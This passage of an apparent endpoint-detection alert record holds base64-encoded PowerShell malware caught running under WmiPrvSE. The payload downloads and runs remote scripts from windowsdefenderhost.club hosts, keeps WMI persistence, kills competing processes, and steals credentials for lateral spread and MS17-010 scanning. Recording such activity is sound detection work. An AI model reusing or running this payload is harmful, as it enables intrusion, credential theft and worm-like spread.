CAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde